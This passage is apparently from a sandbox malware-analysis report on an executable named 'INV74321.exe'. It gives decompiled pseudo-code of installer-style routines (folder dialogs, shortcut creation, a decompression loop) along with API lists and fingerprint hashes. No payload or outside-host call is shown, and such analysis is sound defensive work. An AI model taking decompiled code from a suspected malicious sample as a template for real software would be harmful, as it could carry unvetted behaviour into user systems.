                                                          								_t159 = 0;
                                                          								if(0 == 0x429860) {
                                                          									goto L30;
                                                          								} else {
                                                          									goto L26;
                                                          								}
                                                          								while(1) {
                                                          									L26:
                                                          									_t114 = _v16(0x429860,  &_v48,  &_v28,  &_v40);
                                                          									if(_t114 != 0) {
                                                          										break;
                                                          									}
                                                          									if(_t159 != 0) {
                                                          										 *_t159 =  *_t159 & _t114;
                                                          									}
                                                          									_t160 = E00405AD6(0x429860);
                                                          									 *_t160 =  *_t160 & 0x00000000;
                                                          									_t159 = _t160 - 1;
                                                          									 *_t159 = 0x5c;
                                                          									if(_t159 != 0x429860) {
                                                          										continue;
                                                          									} else {
                                                          										goto L30;
                                                          									}
                                                          								}
                                                          								_t150 = _v44;
                                                          								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                          								_v44 = _t150 >> 0xa;
                                                          								_v12 = 1;
                                                          								_t158 = 0;
                                                          								__eflags = 0;
                                                          								L35:
                                                          								_t168 = 0x400;
                                                          								L36:
                                                          								_t95 = E00404AA1(5);
                                                          								if(_v12 != _t158) {
                                                          									_t197 = _v44;
                                                          									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                          										_v8 = 2;
                                                          									}
                                                          								}
                                                          								_t147 =  *0x42ebfc; // 0x569dca
                                                          								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
                                                          									E00404A89(0x3ff, 0xfffffffb, _t95);
                                                          									if(_v12 == _t158) {
                                                          										SetDlgItemTextA(_a4, _t168, 0x429850);
                                                          									} else {
                                                          										E004049C4(_t168, 0xfffffffc, _v48, _v44);
                                                          									}
                                                          								}
                                                          								_t96 = _v8;
                                                          								 *0x42f4e4 = _t96;
                                                          								if(_t96 == _t158) {
                                                          									_v8 = E0040140B(7);
                                                          								}
                                                          								if(( *(_v32 + 0x14) & _t168) != 0) {
                                                          									_v8 = _t158;
                                                          								}
                                                          								E0040419D(0 | _v8 == _t158);
                                                          								if(_v8 == _t158 &&  *0x42a880 == _t158) {
                                                          									E00404566();
                                                          								}
                                                          								 *0x42a880 = _t158;
                                                          								goto L53;
                                                          							}
                                                          						}
                                                          						_t185 = _a8 - 0x405;
                                                          						if(_a8 != 0x405) {
                                                          							goto L53;
                                                          						}
                                                          						goto L22;
                                                          					}
                                                          					_t118 = _a12 & 0x0000ffff;
                                                          					if(_t118 != 0x3fb) {
                                                          						L12:
                                                          						if(_t118 == 0x3e9) {
                                                          							_t152 = 7;
                                                          							memset( &_v76, 0, _t152 << 2);
                                                          							_v80 = _t166;
                                                          							_v72 = 0x42a890;
                                                          							_v60 = E0040495E;
                                                          							_v56 = _t146;
                                                          							_v68 = E0040618A(_t146, 0x42a890, _t166, 0x429c68, _v12);
                                                          							_t122 =  &_v80;
                                                          							_v64 = 0x41;
                                                          							__imp__SHBrowseForFolderA(_t122);
                                                          							if(_t122 == 0) {
                                                          								_a8 = 0x40f;
                                                          							} else {
                                                          								__imp__CoTaskMemFree(_t122);
                                                          								E00405A8F(_t146);
                                                          								_t125 =  *((intOrPtr*)( *0x42f434 + 0x11c));
                                                          								if( *((intOrPtr*)( *0x42f434 + 0x11c)) != 0 && _t146 == "C:\\Users\\hardz\\AppData\\Local\\Temp") {
                                                          									E0040618A(_t146, 0x42a890, _t166, 0, _t125);
                                                          									if(lstrcmpiA(0x42e3c0, 0x42a890) != 0) {
                                                          										lstrcatA(_t146, 0x42e3c0);
                                                          									}
                                                          								}
                                                          								 *0x42a880 =  *0x42a880 + 1;
                                                          								SetDlgItemTextA(_t166, 0x3fb, _t146);
                                                          							}
                                                          						}
                                                          						goto L20;
                                                          					}
                                                          					if(_a12 >> 0x10 != 0x300) {
                                                          						goto L53;
                                                          					}
                                                          					_a8 = 0x40f;
                                                          					goto L12;
                                                          				} else {
                                                          					_t165 = GetDlgItem(_t166, 0x3fb);
                                                          					if(E00405AFC(_t146) != 0 && E00405B28(_t146) == 0) {
                                                          						E00405A8F(_t146);
                                                          					}
                                                          					 *0x42ebf8 = _t166;
                                                          					SetWindowTextA(_t165, _t146);
                                                          					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                          					_push(1);
                                                          					E0040417B(_t166);
                                                          					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                          					_push(0x14);
                                                          					E0040417B(_t166);
                                                          					E004041B0(_t165);
                                                          					_t138 = E00406500(8);
                                                          					if(_t138 == 0) {
                                                          						L53:
                                                          						return E004041E2(_a8, _a12, _a16);
                                                          					} else {
                                                          						 *_t138(_t165, 1);
                                                          						goto L8;
                                                          					}
                                                          				}
                                                          			}














































                                                          0x00000000
                                                          0x00404656
                                                          0x00404663
                                                          0x0040466c
                                                          0x00404679
                                                          0x00404679
                                                          0x00404680
                                                          0x00404686
                                                          0x0040468f
                                                          0x00404692
                                                          0x00404695
                                                          0x0040469d
                                                          0x004046a0
                                                          0x004046a3
                                                          0x004046a9
                                                          0x004046b0
                                                          0x004046b7
                                                          0x00404949
                                                          0x0040495b
                                                          0x004046bd
                                                          0x004046c0
                                                          0x00000000
                                                          0x004046c0
                                                          0x004046b7

                                                          APIs
                                                          • GetDlgItem.USER32 ref: 0040465C
                                                          • SetWindowTextA.USER32(00000000,?), ref: 00404686
                                                          • SHBrowseForFolderA.SHELL32(?,00429C68,?), ref: 00404737
                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404742
                                                          • lstrcmpiA.KERNEL32(GHFGHFGHFDGDFGDFg,0042A890,00000000,?,?), ref: 00404774
                                                          • lstrcatA.KERNEL32(?,GHFGHFGHFDGDFGDFg), ref: 00404780
                                                          • SetDlgItemTextA.USER32 ref: 00404792
                                                            • Part of subcall function 004057F7: GetDlgItemTextA.USER32 ref: 0040580A
                                                            • Part of subcall function 004063D2: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\INV74321.exe" ,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
                                                            • Part of subcall function 004063D2: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
                                                            • Part of subcall function 004063D2: CharNextA.USER32(?,"C:\Users\user\Desktop\INV74321.exe" ,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
                                                            • Part of subcall function 004063D2: CharPrevA.USER32(?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C
                                                          • GetDiskFreeSpaceA.KERNEL32(00429860,?,?,0000040F,?,00429860,00429860,?,00000001,00429860,?,?,000003FB,?), ref: 00404850
                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040486B
                                                            • Part of subcall function 004049C4: lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                                                            • Part of subcall function 004049C4: wsprintfA.USER32 ref: 00404A6A
                                                            • Part of subcall function 004049C4: SetDlgItemTextA.USER32 ref: 00404A7D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp
                                                          Similarity
                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: A$C:\Users\user\AppData\Local\Temp$GHFGHFGHFDGDFGDFg
                                                          • API String ID: 2624150263-432094902
                                                          • Opcode ID: e2093240277334122aeb027a85fba7e6720a3e9e52d6b68153c58a68e5512187
                                                          • Instruction ID: 02b07c61478aeb9ac600f99876a590f4236d4304051c708c1213a6c52027fc1c
                                                          • Opcode Fuzzy Hash: e2093240277334122aeb027a85fba7e6720a3e9e52d6b68153c58a68e5512187
                                                          • Instruction Fuzzy Hash: CAA16FB1900209ABDB11EFA6DD45AAF77B8EF84314F14843BF601B62D1DB7C89418B69
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 74%
                                                          			E0040216B() {
                                                          				signed int _t55;
                                                          				void* _t59;
                                                          				intOrPtr* _t63;
                                                          				intOrPtr _t64;
                                                          				intOrPtr* _t65;
                                                          				intOrPtr* _t67;
                                                          				intOrPtr* _t69;
                                                          				intOrPtr* _t71;
                                                          				intOrPtr* _t73;
                                                          				intOrPtr* _t75;
                                                          				intOrPtr* _t78;
                                                          				intOrPtr* _t80;
                                                          				intOrPtr* _t82;
                                                          				intOrPtr* _t84;
                                                          				int _t87;
                                                          				intOrPtr* _t95;
                                                          				signed int _t105;
                                                          				signed int _t109;
                                                          				void* _t111;
                                                          
                                                          				 *(_t111 - 0x38) = E00402BCE(0xfffffff0);
                                                          				 *(_t111 - 0xc) = E00402BCE(0xffffffdf);
                                                          				 *((intOrPtr*)(_t111 - 0x88)) = E00402BCE(2);
                                                          				 *((intOrPtr*)(_t111 - 0x34)) = E00402BCE(0xffffffcd);
                                                          				 *((intOrPtr*)(_t111 - 0x78)) = E00402BCE(0x45);
                                                          				_t55 =  *(_t111 - 0x18);
                                                          				 *(_t111 - 0x90) = _t55 & 0x00000fff;
                                                          				_t105 = _t55 & 0x00008000;
                                                          				_t109 = _t55 >> 0x0000000c & 0x00000007;
                                                          				 *(_t111 - 0x74) = _t55 >> 0x00000010 & 0x0000ffff;
                                                          				if(E00405AFC( *(_t111 - 0xc)) == 0) {
                                                          					E00402BCE(0x21);
                                                          				}
                                                          				_t59 = _t111 + 8;
                                                          				__imp__CoCreateInstance(0x408524, _t87, 1, 0x408514, _t59);
                                                          				if(_t59 < _t87) {
                                                          					L15:
                                                          					 *((intOrPtr*)(_t111 - 4)) = 1;
                                                          					_push(0xfffffff0);
                                                          				} else {
                                                          					_t63 =  *((intOrPtr*)(_t111 + 8));
                                                          					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408534, _t111 - 0x30);
                                                          					 *((intOrPtr*)(_t111 - 8)) = _t64;
                                                          					if(_t64 >= _t87) {
                                                          						_t67 =  *((intOrPtr*)(_t111 + 8));
                                                          						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
                                                          						if(_t105 == _t87) {
                                                          							_t84 =  *((intOrPtr*)(_t111 + 8));
                                                          							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\hardz\\AppData\\Local\\Temp");
                                                          						}
                                                          						if(_t109 != _t87) {
                                                          							_t82 =  *((intOrPtr*)(_t111 + 8));
                                                          							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
                                                          						}
                                                          						_t69 =  *((intOrPtr*)(_t111 + 8));
                                                          						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x74));
                                                          						_t95 =  *((intOrPtr*)(_t111 - 0x34));
                                                          						if( *_t95 != _t87) {
                                                          							_t80 =  *((intOrPtr*)(_t111 + 8));
                                                          							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x90));
                                                          						}
                                                          						_t71 =  *((intOrPtr*)(_t111 + 8));
                                                          						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x88)));
                                                          						_t73 =  *((intOrPtr*)(_t111 + 8));
                                                          						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x78)));
                                                          						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
                                                          							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
                                                          							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x38), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
                                                          								_t78 =  *((intOrPtr*)(_t111 - 0x30));
                                                          								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
                                                          							}
                                                          						}
                                                          						_t75 =  *((intOrPtr*)(_t111 - 0x30));
                                                          						 *((intOrPtr*)( *_t75 + 8))(_t75);
                                                          					}
                                                          					_t65 =  *((intOrPtr*)(_t111 + 8));
                                                          					 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                          					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
                                                          						_push(0xfffffff4);
                                                          					} else {
                                                          						goto L15;
                                                          					}
                                                          				}
                                                          				E00401423();
                                                          				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t111 - 4));
                                                          				return 0;
                                                          			}























                                                          APIs
                                                          • CoCreateInstance.OLE32(00408524,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
                                                          • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp, xrefs: 00402230
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: ByteCharCreateInstanceMultiWide
                                                          • String ID: C:\Users\user\AppData\Local\Temp
                                                          • API String ID: 123533781-501415292
                                                          • Opcode ID: 3c5799551ecf467b98758a7772b9f68a95bcaf766b99ab5d6102861f06629b87
                                                          • Instruction ID: cfd0f9f97044ed47efa98841b374527745dcc5d1cf4597a5ef188e8ddd78f045
                                                          • Opcode Fuzzy Hash: 3c5799551ecf467b98758a7772b9f68a95bcaf766b99ab5d6102861f06629b87
                                                          • Instruction Fuzzy Hash: DF510671A00208AFCB50DFE4C989E9D7BB6FF48314F2041AAF515EB2D1DA799981CB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 39%
                                                          			E004027A1(char __ebx, char* __edi, char* __esi) {
                                                          				void* _t19;
                                                          
                                                          				if(FindFirstFileA(E00402BCE(2), _t19 - 0x1d0) != 0xffffffff) {
                                                          					E00406055(__edi, _t6);
                                                          					_push(_t19 - 0x1a4);
                                                          					_push(__esi);
                                                          					E004060F7();
                                                          				} else {
                                                          					 *__edi = __ebx;
                                                          					 *__esi = __ebx;
                                                          					 *((intOrPtr*)(_t19 - 4)) = 1;
                                                          				}
                                                          				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t19 - 4));
                                                          				return 0;
                                                          			}





                                                          APIs
                                                          • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027B0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: FileFindFirst
                                                          • String ID:
                                                          • API String ID: 1974802433-0
                                                          • Opcode ID: 4423a52aeb003c350b17b55cd02f29573d1ce5b782dbbfafeefecc88e991a537
                                                          • Instruction ID: cbd12963852304709d998dbd60bf7e8f33587a64a337c4fd13578998f516bfb3
                                                          • Opcode Fuzzy Hash: 4423a52aeb003c350b17b55cd02f29573d1ce5b782dbbfafeefecc88e991a537
                                                          • Instruction Fuzzy Hash: 3EF0A072604110DED711EBA49A49AFEB768AF61314F60457FF112B20C1D7B889469B3A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 79%
                                                          			E00406945(signed int __ebx, signed int* __esi) {
                                                          				signed int _t396;
                                                          				signed int _t425;
                                                          				signed int _t442;
                                                          				signed int _t443;
                                                          				signed int* _t446;
                                                          				void* _t448;
                                                          
                                                          				L0:
                                                          				while(1) {
                                                          					L0:
                                                          					_t446 = __esi;
                                                          					_t425 = __ebx;
                                                          					if( *(_t448 - 0x34) == 0) {
                                                          						break;
                                                          					}
                                                          					L55:
                                                          					__eax =  *(__ebp - 0x38);
                                                          					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                          					__ecx = __ebx;
                                                          					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                          					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                          					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                          					__ebx = __ebx + 8;
                                                          					while(1) {
                                                          						L56:
                                                          						if(__ebx < 0xe) {
                                                          							goto L0;
                                                          						}
                                                          						L57:
                                                          						__eax =  *(__ebp - 0x40);
                                                          						__eax =  *(__ebp - 0x40) & 0x00003fff;
                                                          						__ecx = __eax;
                                                          						__esi[1] = __eax;
                                                          						__ecx = __eax & 0x0000001f;
                                                          						if(__cl > 0x1d) {
                                                          							L9:
                                                          							_t443 = _t442 | 0xffffffff;
                                                          							 *_t446 = 0x11;
                                                          							L10:
                                                          							_t446[0x147] =  *(_t448 - 0x40);
                                                          							_t446[0x146] = _t425;
                                                          							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
                                                          							L11:
                                                          							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
                                                          							_t446[0x26ea] =  *(_t448 - 0x30);
                                                          							E004070B4( *(_t448 + 8));
                                                          							return _t443;
                                                          						}
                                                          						L58:
                                                          						__eax = __eax & 0x000003e0;
                                                          						if(__eax > 0x3a0) {
                                                          							goto L9;
                                                          						}
                                                          						L59:
                                                          						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
                                                          						__ebx = __ebx - 0xe;
                                                          						_t94 =  &(__esi[2]);
                                                          						 *_t94 = __esi[2] & 0x00000000;
                                                          						 *__esi = 0xc;
                                                          						while(1) {
                                                          							L60:
                                                          							__esi[1] = __esi[1] >> 0xa;
                                                          							__eax = (__esi[1] >> 0xa) + 4;
                                                          							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                          								goto L68;
                                                          							}
                                                          							L61:
                                                          							while(1) {
                                                          								L64:
                                                          								if(__ebx >= 3) {
                                                          									break;
                                                          								}
                                                          								L62:
                                                          								if( *(__ebp - 0x34) == 0) {
                                                          									goto L182;
                                                          								}
                                                          								L63:
                                                          								__eax =  *(__ebp - 0x38);
                                                          								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                          								__ecx = __ebx;
                                                          								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                          								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                          								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                          								__ebx = __ebx + 8;
                                                          							}
                                                          							L65:
                                                          							__ecx = __esi[2];
                                                          							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
                                                          							__ebx = __ebx - 3;
                                                          							_t108 = __ecx + 0x408408; // 0x121110
                                                          							__ecx =  *_t108;
                                                          							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
                                                          							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
                                                          							__ecx = __esi[1];
                                                          							__esi[2] = __esi[2] + 1;
                                                          							__eax = __esi[2];
                                                          							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
                                                          							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
                                                          								goto L64;
                                                          							}
                                                          							L66:
                                                          							while(1) {
                                                          								L68:
                                                          								if(__esi[2] >= 0x13) {
                                                          									break;
                                                          								}
                                                          								L67:
                                                          								_t119 = __esi[2] + 0x408408; // 0x4000300
                                                          								__eax =  *_t119;
                                                          								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
                                                          								_t126 =  &(__esi[2]);
                                                          								 *_t126 = __esi[2] + 1;
                                                          							}
                                                          							L69:
                                                          							__ecx = __ebp - 8;
                                                          							__edi =  &(__esi[0x143]);
                                                          							 &(__esi[0x148]) =  &(__esi[0x144]);
                                                          							__eax = 0;
                                                          							 *(__ebp - 8) = 0;
                                                          							__eax =  &(__esi[3]);
                                                          							 *__edi = 7;
                                                          							__eax = E0040711C( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
                                                          							if(__eax != 0) {
                                                          								L72:
                                                          								 *__esi = 0x11;
                                                          								while(1) {
                                                          									L180:
                                                          									_t396 =  *_t446;
                                                          									if(_t396 > 0xf) {
                                                          										break;
                                                          									}
                                                          									L1:
                                                          									switch( *((intOrPtr*)(_t396 * 4 +  &M00407074))) {
                                                          										case 0:
                                                          											L101:
                                                          											__eax = __esi[4] & 0x000000ff;
                                                          											__esi[3] = __esi[4] & 0x000000ff;
                                                          											__eax = __esi[5];
                                                          											__esi[2] = __esi[5];
                                                          											 *__esi = 1;
                                                          											goto L102;
                                                          										case 1:
                                                          											L102:
                                                          											__eax = __esi[3];
                                                          											while(1) {
                                                          												L105:
                                                          												__eflags = __ebx - __eax;
                                                          												if(__ebx >= __eax) {
                                                          													break;
                                                          												}
                                                          												L103:
                                                          												__eflags =  *(__ebp - 0x34);
                                                          												if( *(__ebp - 0x34) == 0) {
                                                          													goto L182;
                                                          												}
                                                          												L104:
                                                          												__ecx =  *(__ebp - 0x38);
                                                          												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                          												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                          												__ecx = __ebx;
                                                          												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                          												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                          												__ebx = __ebx + 8;
                                                          												__eflags = __ebx;
                                                          											}
                                                          											L106:
                                                          											__eax =  *(0x40a408 + __eax * 2) & 0x0000ffff;
                                                          											__eax = __eax &  *(__ebp - 0x40);
                                                          											__ecx = __esi[2];
                                                          											__eax = __esi[2] + __eax * 4;
                                                          											__ecx =  *(__eax + 1) & 0x000000ff;
                                                          											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                          											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                          											__ecx =  *__eax & 0x000000ff;
                                                          											__eflags = __ecx;
                                                          											if(__ecx != 0) {
                                                          												L108:
                                                          												__eflags = __cl & 0x00000010;
                                                          												if((__cl & 0x00000010) == 0) {
                                                          													L110:
                                                          													__eflags = __cl & 0x00000040;
                                                          													if((__cl & 0x00000040) == 0) {
                                                          														goto L125;
                                                          													}
                                                          													L111:
                                                          													__eflags = __cl & 0x00000020;
                                                          													if((__cl & 0x00000020) == 0) {
                                                          														goto L9;
                                                          													}
                                                          													L112:
                                                          													 *__esi = 7;
                                                          													goto L180;
                                                          												}
                                                          												L109:
                                                          												__esi[2] = __ecx;
                                                          												__esi[1] = __eax;
                                                          												 *__esi = 2;
                                                          												goto L180;
                                                          											}
                                                          											L107:
                                                          											__esi[2] = __eax;
                                                          											 *__esi = 6;
                                                          											goto L180;
                                                          										case 2:
                                                          											L113:
                                                          											__eax = __esi[2];
                                                          											while(1) {
                                                          												L116:
                                                          												__eflags = __ebx - __eax;
                                                          												if(__ebx >= __eax) {
                                                          													break;
                                                          												}
                                                          												L114:
                                                          												__eflags =  *(__ebp - 0x34);
                                                          												if( *(__ebp - 0x34) == 0) {
                                                          													goto L182;
                                                          												}
                                                          												L115:
                                                          												__ecx =  *(__ebp - 0x38);
                                                          												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                          												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                          												__ecx = __ebx;
                                                          												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                          												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                          												__ebx = __ebx + 8;
                                                          												__eflags = __ebx;
                                                          											}
                                                          											L117:
                                                          											 *(0x40a408 + __eax * 2) & 0x0000ffff =  *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                          											__esi[1] = __esi[1] + ( *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                          											__ecx = __eax;
                                                          											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                          											__ebx = __ebx - __eax;
                                                          											__eflags = __ebx;
                                                          											__eax = __esi[4] & 0x000000ff;
                                                          											__esi[3] = __esi[4] & 0x000000ff;
                                                          											__eax = __esi[6];
                                                          											__esi[2] = __esi[6];
                                                          											 *__esi = 3;
                                                          											goto L118;
                                                          										case 3:
                                                          											L118:
                                                          											__eax = __esi[3];
                                                          											while(1) {
                                                          												L121:
                                                          												__eflags = __ebx - __eax;
                                                          												if(__ebx >= __eax) {
                                                          													break;
                                                          												}
                                                          												L119:
                                                          												__eflags =  *(__ebp - 0x34);
                                                          												if( *(__ebp - 0x34) == 0) {
                                                          													goto L182;
                                                          												}
                                                          												L120:
                                                          												__ecx =  *(__ebp - 0x38);
                                                          												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                          												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                          												__ecx = __ebx;
                                                          												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                          												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                          												__ebx = __ebx + 8;
                                                          												__eflags = __ebx;
                                                          											}
                                                          											L122:
                                                          											__eax =  *(0x40a408 + __eax * 2) & 0x0000ffff;
                                                          											__eax = __eax &  *(__ebp - 0x40);
                                                          											__ecx = __esi[2];
                                                          											__eax = __esi[2] + __eax * 4;
                                                          											__ecx =  *(__eax + 1) & 0x000000ff;
                                                          											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                          											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                          											__ecx =  *__eax & 0x000000ff;
                                                          											__eflags = __cl & 0x00000010;
                                                          											if((__cl & 0x00000010) == 0) {
                                                          												L124:
                                                          												__eflags = __cl & 0x00000040;
                                                          												if((__cl & 0x00000040) != 0) {
                                                          													goto L9;
                                                          												}
                                                          												L125:
                                                          												__esi[3] = __ecx;
                                                          												__ecx =  *(__eax + 2) & 0x0000ffff;
                                                          												__esi[2] = __eax;
                                                          												goto L180;
                                                          											}
                                                          											L123:
                                                          											__esi[2] = __ecx;
                                                          											__esi[3] = __eax;
                                                          											 *__esi = 4;
                                                          											goto L180;
                                                          										case 4:
                                                          											L126:
                                                          											__eax = __esi[2];
                                                          											while(1) {
                                                          												L129:
                                                          												__eflags = __ebx - __eax;
                                                          												if(__ebx >= __eax) {
                                                          													break;
                                                          												}
                                                          												L127:
                                                          												__eflags =  *(__ebp - 0x34);
                                                          												if( *(__ebp - 0x34) == 0) {
                                                          													goto L182;
                                                          												}
                                                          												L128:
                                                          												__ecx =  *(__ebp - 0x38);
                                                          												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                          												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                          												__ecx = __ebx;
                                                          												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                          												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                          												__ebx = __ebx + 8;
                                                          												__eflags = __ebx;
                                                          											}
                                                          											L130:
                                                          											 *(0x40a408 + __eax * 2) & 0x0000ffff =  *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                          											__esi[3] = __esi[3] + ( *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                          											__ecx = __eax;
                                                          											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                          											__ebx = __ebx - __eax;
                                                          											__eflags = __ebx;
                                                          											 *__esi = 5;
                                                          											goto L131;
                                                          										case 5:
                                                          											L131:
                                                          											__eax =  *(__ebp - 0x30);
                                                          											__edx = __esi[3];
                                                          											__eax = __eax - __esi;
                                                          											__ecx = __eax - __esi - 0x1ba0;
                                                          											__eflags = __eax - __esi - 0x1ba0 - __edx;
                                                          											if(__eax - __esi - 0x1ba0 >= __edx) {
                                                          												__ecx = __eax;
                                                          												__ecx = __eax - __edx;
                                                          												__eflags = __ecx;
                                                          											} else {
                                                          												__esi[0x26e8] = __esi[0x26e8] - __edx;
                                                          												__ecx = __esi[0x26e8] - __edx - __esi;
